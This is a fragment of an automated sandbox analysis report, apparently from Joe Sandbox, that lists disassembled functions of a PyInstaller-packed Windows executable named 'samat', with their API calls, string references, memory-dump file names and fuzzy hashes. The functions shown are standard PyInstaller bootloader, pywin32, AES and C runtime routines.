Expected a socket object or numeric socket handle, xrefs: 00007FF8B7E8C0E6
fileno, xrefs: 00007FF8B7E8C045

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Err_$ClearDeallocObject_String$AttrCallCallable_CheckObject
String ID: Expected a socket object or numeric socket handle$fileno
API String ID: 994754094-511972153
Opcode ID: 7b3fa4a733cc4a24dd089f9560dc52097b810a406d96155e0d7f2db213339288
Instruction ID: c2b5bb92a16273428190a763720d6dbf37e2d3d01503a19dd3aeaf335a7ea7d4
Opcode Fuzzy Hash: 7b3fa4a733cc4a24dd089f9560dc52097b810a406d96155e0d7f2db213339288
Instruction Fuzzy Hash: ED21F822E18B4292FB458F6AE95423D62A1AF49FD8F488071EB1E477F6DE3CE4458701

Function 00007FF8B7E89AB0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 62COMMON

Download Yara Rule

APIs

PyImport_ImportModule.PYTHON313 ref: 00007FF8B7E89AD1
PyObject_GetAttrString.PYTHON313 ref: 00007FF8B7E89AED
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E89B04
PyTuple_New.PYTHON313 ref: 00007FF8B7E89B11
PyObject_CallMethod.PYTHON313 ref: 00007FF8B7E89B30
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E89B4B
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E89B66

Strings

win32timezone, xrefs: 00007FF8B7E89ACA
utc, xrefs: 00007FF8B7E89B29
TimeZoneInfo, xrefs: 00007FF8B7E89AE3

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Dealloc$Object_$AttrCallImportImport_MethodModuleStringTuple_
String ID: TimeZoneInfo$utc$win32timezone
API String ID: 4031171350-3909237026
Opcode ID: 1639c5302ffb4b87e894b55701020ee97428cbbd91a9955a819a0ce4ffca2fd5
Instruction ID: fc9bd51a51c1b03b2633d0a68006a57e8ca0517324d2176766838f28a2b393e9
Opcode Fuzzy Hash: 1639c5302ffb4b87e894b55701020ee97428cbbd91a9955a819a0ce4ffca2fd5
Instruction Fuzzy Hash: 0421E732E09B4282FB558B59E95427C23A0AF49FE1F884035DB0E067B2EF3CE440C304

Function 00007FF8B8261030 Relevance: 16.7, APIs: 11, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF8B8261058
__scrt_initialize_crt.LIBCMT ref: 00007FF8B826109D
__scrt_acquire_startup_lock.LIBCMT ref: 00007FF8B82610AA
_RTC_Initialize.LIBCMT ref: 00007FF8B82610D8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FF8B82610FE
__scrt_release_startup_lock.LIBCMT ref: 00007FF8B8261129

Memory Dump Source

Source File: 00000008.00000002.4573993442.00007FF8B8261000.00000020.00000001.01000000.0000002F.sdmp, Offset: 00007FF8B8260000, based on PE: true

Associated: 00000008.00000002.4573922181.00007FF8B8260000.00000002.00000001.01000000.0000002F.sdmpDownload File
Associated: 00000008.00000002.4574064690.00007FF8B8263000.00000002.00000001.01000000.0000002F.sdmpDownload File
Associated: 00000008.00000002.4574129290.00007FF8B8264000.00000004.00000001.01000000.0000002F.sdmpDownload File
Associated: 00000008.00000002.4574205224.00007FF8B8265000.00000002.00000001.01000000.0000002F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b8260000_samat.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 349153199-0
Opcode ID: 31d8e522e61a33cf479bf52350be3450eaa8bff41c9a3cd264d2142d6b397c0f
Instruction ID: 283bfa55f77b2c9eb0c85dd4faf18d78e3c6242ad104a9777e95888380726e4e
Opcode Fuzzy Hash: 31d8e522e61a33cf479bf52350be3450eaa8bff41c9a3cd264d2142d6b397c0f
Instruction Fuzzy Hash: E3816921E1C28387FA54AB6EA4412B976A0AF96BC2F544035DB4D87796DF3CF8478708

Function 00007FF8B7E8CD50 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 98COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON313 ref: 00007FF8B7E8CDA6
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E8CDE4
PyErr_Format.PYTHON313 ref: 00007FF8B7E8CE06
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E8CE17
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E8CE3D

Strings

Sequence of dwords cannot be None, xrefs: 00007FF8B7E8CD9C
Unable to allocate %d bytes, xrefs: 00007FF8B7E8CDF9

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Err_$DeallocFormatStringfreemalloc
String ID: Sequence of dwords cannot be None$Unable to allocate %d bytes
API String ID: 3558336878-651347692
Opcode ID: fcb0ab8fe880c01fc9c4e7ef5ed6a4521f4b799ff651dcb487074c39814b8e6a
Instruction ID: 2f2140b6fe512a2ec34ed25647bc072f6d3677743c37a07658071ff62b318e69
Opcode Fuzzy Hash: fcb0ab8fe880c01fc9c4e7ef5ed6a4521f4b799ff651dcb487074c39814b8e6a
Instruction Fuzzy Hash: B041E232A09B4286EB14CF5AA44423C63A4BF89FD4F494572EB5D43BB5EE3CE486D704

Function 00007FF8B7E8C220 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 36memorythreadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 00007FF8B7E8C22A
_Py_FatalErrorFunc.PYTHON313 ref: 00007FF8B7E8C250
LocalAlloc.KERNEL32 ref: 00007FF8B7E8C264
_Py_FatalErrorFunc.PYTHON313 ref: 00007FF8B7E8C280
TlsSetValue.KERNEL32 ref: 00007FF8B7E8C290
PyThreadState_New.PYTHON313 ref: 00007FF8B7E8C29D

Strings

Out of memory allocating thread state., xrefs: 00007FF8B7E8C272
PyWinThreadState_Ensure, xrefs: 00007FF8B7E8C249, 00007FF8B7E8C279
Can not setup thread state, as have no interpreter state, xrefs: 00007FF8B7E8C242

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: ErrorFatalFuncValue$AllocLocalState_Thread
String ID: Can not setup thread state, as have no interpreter state$Out of memory allocating thread state.$PyWinThreadState_Ensure
API String ID: 1925565299-3250566352
Opcode ID: 1cac388a50adace923c6ae1d37d3e8f41fd299e6d5f024e93c89565b812c4a96
Instruction ID: 094a7758461ed6b508186b727d5650e60d20b482d7289a6c75d6c65bb8df52d4
Opcode Fuzzy Hash: 1cac388a50adace923c6ae1d37d3e8f41fd299e6d5f024e93c89565b812c4a96
Instruction Fuzzy Hash: DF110936A09B0692EB488B59E89426D23B0BF48FC8F840535D70D422B4EE7CA5998700

Function 00007FF7E12D6290 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12D62D3
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12D66C0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12D695C

Strings

p, xrefs: 00007FF7E12D6385
p, xrefs: 00007FF7E12D63FD
:, xrefs: 00007FF7E12D648C
f, xrefs: 00007FF7E12D63F5
-, xrefs: 00007FF7E12D6369

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction ID: 1a94a1b793212a6b0b17cef60065daf4d81db9c63eb3fba2a5528fff43d401e3
Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction Fuzzy Hash: 0612C663F0C24386FB64BA14D9163B9F65AFB40750FC44137D6A946AC8DFBCE5848B22

Function 00007FF7E12D0FC8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12D1008
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12D13D0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12D166F

Strings

p, xrefs: 00007FF7E12D1112
p, xrefs: 00007FF7E12D10AD
f, xrefs: 00007FF7E12D10A0
f, xrefs: 00007FF7E12D1255
f, xrefs: 00007FF7E12D110A

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction ID: f235075364ba54f1f8c0bf505dd7a2df8deb66df97d2d849682a01aa40e59752
Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction Fuzzy Hash: BC127363F0C18385FB646B14E856779E6A9FB40750FD84033E69A46DC4DFBCE480AB62

Function 00007FF8B8262760 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 154COMMON

Download Yara Rule

APIs

_wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B82627DA
memcpy.VCRUNTIME140 ref: 00007FF8B82627FC
_wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B826286E

Strings

(idx>=1) && (idx<=10), xrefs: 00007FF8B8262867, 00007FF8B8262994
((Nk==4) && (Nr==10)) || ((Nk==6) && (Nr==12)) || ((Nk==8) && (Nr==14)), xrefs: 00007FF8B82627D3
src/AESNI.c, xrefs: 00007FF8B8262860, 00007FF8B826298D
src/AESNI.c, xrefs: 00007FF8B82627CC

Memory Dump Source

Source File: 00000008.00000002.4573993442.00007FF8B8261000.00000020.00000001.01000000.0000002F.sdmp, Offset: 00007FF8B8260000, based on PE: true

Associated: 00000008.00000002.4573922181.00007FF8B8260000.00000002.00000001.01000000.0000002F.sdmpDownload File
Associated: 00000008.00000002.4574064690.00007FF8B8263000.00000002.00000001.01000000.0000002F.sdmpDownload File
Associated: 00000008.00000002.4574129290.00007FF8B8264000.00000004.00000001.01000000.0000002F.sdmpDownload File
Associated: 00000008.00000002.4574205224.00007FF8B8265000.00000002.00000001.01000000.0000002F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b8260000_samat.jbxd

Similarity

API ID: _wassert$memcpy
String ID: ((Nk==4) && (Nr==10)) || ((Nk==6) && (Nr==12)) || ((Nk==8) && (Nr==14))$(idx>=1) && (idx<=10)$src/AESNI.c$src/AESNI.c
API String ID: 4292997394-722309440
Opcode ID: d39dd8ff127fcd6812d8991013f514968d842da6ae2888197d778fac17dca971
Instruction ID: f525bbe3a4cb853b7149903374c8349b2bae2c2f1d2361bbda5363b6427b9d6e
Opcode Fuzzy Hash: d39dd8ff127fcd6812d8991013f514968d842da6ae2888197d778fac17dca971
Instruction Fuzzy Hash: E461D172E0868787FA218F28E4446B973A1FB997C5F504231CB8D23655EF3CE58AC748

Function 00007FF7E12C1050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to read data chunk!, xrefs: 00007FF7E12C11F6
malloc, xrefs: 00007FF7E12C110F
Failed to extract %s: failed to open archive file!, xrefs: 00007FF7E12C1098
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF7E12C10CC
fread, xrefs: 00007FF7E12C11FD
fseek, xrefs: 00007FF7E12C10D3
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF7E12C1108

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: 468a76a4cb26e22acb17f3c3bd12dc52913c62a662c8255ac5cb6751174899c7
Instruction ID: 6dbcc13cc60ab29eda98f8d574c6f0b47032779822d3011bcfdf55b575bbdc6b
Opcode Fuzzy Hash: 468a76a4cb26e22acb17f3c3bd12dc52913c62a662c8255ac5cb6751174899c7
Instruction Fuzzy Hash: 11415C22B0869286EB10FB11AC067B9A398BF84BC4FD44433EE4C47795DEBCE501D762

Function 00007FF7E12C8660 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(?,?,00000000,00007FF7E12C3CBB), ref: 00007FF7E12C8704
GetCurrentProcessId.KERNEL32(?,00000000,00007FF7E12C3CBB), ref: 00007FF7E12C870A
CreateDirectoryW.KERNEL32(?,00000000,00007FF7E12C3CBB), ref: 00007FF7E12C874C

Part of subcall function 00007FF7E12C8830: GetEnvironmentVariableW.KERNEL32(00007FF7E12C388E), ref: 00007FF7E12C8867
Part of subcall function 00007FF7E12C8830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7E12C8889

Part of subcall function 00007FF7E12D8238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12D8251

Part of subcall function 00007FF7E12C2810: MessageBoxW.USER32 ref: 00007FF7E12C28EA

Strings

LOADER: failed to set the TMP environment variable., xrefs: 00007FF7E12C86DC
TMP, xrefs: 00007FF7E12C869C, 00007FF7E12C87A3
TMP, xrefs: 00007FF7E12C86C2
LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF7E12C877E
_MEI%d, xrefs: 00007FF7E12C8712

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
API String ID: 3563477958-1339014028
Opcode ID: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
Instruction ID: b0f671e3da96fe24b91e5f5725e33ce6cb05d2544f8ab813874516cf45b85df0
Opcode Fuzzy Hash: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
Instruction Fuzzy Hash: 6441A312B1964245FB15F725AC5B3BA9258AF847C4FC18133EE0D477D6EEBCE445C222

Function 00007FF8B7E8BDF0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 61COMMON

Download Yara Rule

APIs

PyMem_Free.PYTHON313 ref: 00007FF8B7E8BE0E
PyBuffer_Release.PYTHON313 ref: 00007FF8B7E8BE32
PyErr_SetString.PYTHON313 ref: 00007FF8B7E8BE52
PyObject_GetBuffer.PYTHON313 ref: 00007FF8B7E8BE69
PyBuffer_Release.PYTHON313 ref: 00007FF8B7E8BE85
PyErr_Format.PYTHON313 ref: 00007FF8B7E8BE9F

Strings

Buffer cannot be None, xrefs: 00007FF8B7E8BE48
Buffer length can be at most %d characters, xrefs: 00007FF8B7E8BE92

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Buffer_Err_Release$BufferFormatFreeMem_Object_String
String ID: Buffer cannot be None$Buffer length can be at most %d characters
API String ID: 1675121998-686265896
Opcode ID: f330a7b27ad2e46ddd567d8aaf1c1d2df901e711178c835d73696d74e6b5d538
Instruction ID: 1938dac5fc7ec6b87ef27f7ff0d1754e40016fb705de7187362783a1142c2799
Opcode Fuzzy Hash: f330a7b27ad2e46ddd567d8aaf1c1d2df901e711178c835d73696d74e6b5d538
Instruction Fuzzy Hash: B931E722A19B4686EB548F69E44033C2360FF44FD4F945032EB5E866B6DF3CE895C340

Function 00007FF8B7E89CA0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

PyTuple_Size.PYTHON313 ref: 00007FF8B7E89CC1
Py_BuildValue.PYTHON313 ref: 00007FF8B7E89CDA
PyObject_GetAttrString.PYTHON313 ref: 00007FF8B7E89CF5
PyObject_Call.PYTHON313 ref: 00007FF8B7E89D0C
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E89D28
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E89D41

Strings

(s), xrefs: 00007FF8B7E89CD3
strftime, xrefs: 00007FF8B7E89CEB

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: DeallocObject_$AttrBuildCallSizeStringTuple_Value
String ID: (s)$strftime
API String ID: 4125559156-1254993691
Opcode ID: 705837201b98d33591091aae69fea6291c16dfc55d7ca099a681a7f42eb1c854
Instruction ID: 47409ee73a1312cabc485ec1469d13683f87bf41e50a910804597283d198ff7a
Opcode Fuzzy Hash: 705837201b98d33591091aae69fea6291c16dfc55d7ca099a681a7f42eb1c854
Instruction Fuzzy Hash: 53110A26E09B4286FB558F5AA95837D63A1AF45FD4F885034DB0D07BBAEF3CE4418704

Function 00007FF8B7E88940 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E88961
IsValidSecurityDescriptor.ADVAPI32 ref: 00007FF8B7E8897A

Strings

GetSecurityDescriptorControl - invalid sd, xrefs: 00007FF8B7E88986
(ii), xrefs: 00007FF8B7E889C8
:GetSecurityDescriptorControl, xrefs: 00007FF8B7E8894E
GetSecurityDescriptorControl, xrefs: 00007FF8B7E889B1

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Arg_DescriptorParseSecurityTupleValid
String ID: (ii)$:GetSecurityDescriptorControl$GetSecurityDescriptorControl$GetSecurityDescriptorControl - invalid sd
API String ID: 1292091245-2499011972
Opcode ID: 0c79a85f94f1c090c5a74baff4f4abb4b723d10cf59a6917a5b5309dfcd3027e
Instruction ID: 069250f45ba10541c33bc54d228a3c48a03bbac3f29f6139766550484fb0feed
Opcode Fuzzy Hash: 0c79a85f94f1c090c5a74baff4f4abb4b723d10cf59a6917a5b5309dfcd3027e
Instruction Fuzzy Hash: 09015693F2874282FB549B69B8400BD2351EF95FC5F485035DB0E426B6EE3CD995C710

Function 00007FF7E12CEA08 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF7E12CEA65

Part of subcall function 00007FF7E12CF9BC: __GetUnwindTryBlock.LIBCMT ref: 00007FF7E12CF9FF
Part of subcall function 00007FF7E12CF9BC: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF7E12CFA24

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF7E12CEB3D
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF7E12CED8B
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7E12CEE98

Strings

csm, xrefs: 00007FF7E12CEAE6
csm, xrefs: 00007FF7E12CEA7F
csm, xrefs: 00007FF7E12CEB60

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
Instruction ID: b80047ece2a6c09095f5d7f99eb1595d97a9f815f1859d40cf0a1c13094bcf88
Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
Instruction Fuzzy Hash: 3AD1A272B0874186EB20AF25D8423ADBBA8FB44798F900136DF4D57795DF78E180C752

Function 00007FF7E12C2C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7E12C3706,?,00007FF7E12C3804), ref: 00007FF7E12C2C9E
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7E12C3706,?,00007FF7E12C3804), ref: 00007FF7E12C2D63
MessageBoxW.USER32 ref: 00007FF7E12C2D99

Strings

%ls: , xrefs: 00007FF7E12C2D22
Error, xrefs: 00007FF7E12C2D8C
<FormatMessageW failed.>, xrefs: 00007FF7E12C2D70
[PYI-%d:ERROR] , xrefs: 00007FF7E12C2CA6

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: Message$CurrentFormatProcess
String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
API String ID: 3940978338-251083826
Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
Instruction ID: 187e43ec799e49da231e51653b2d225c75f837ad1fbaf07bc2a2c70cfe28270d
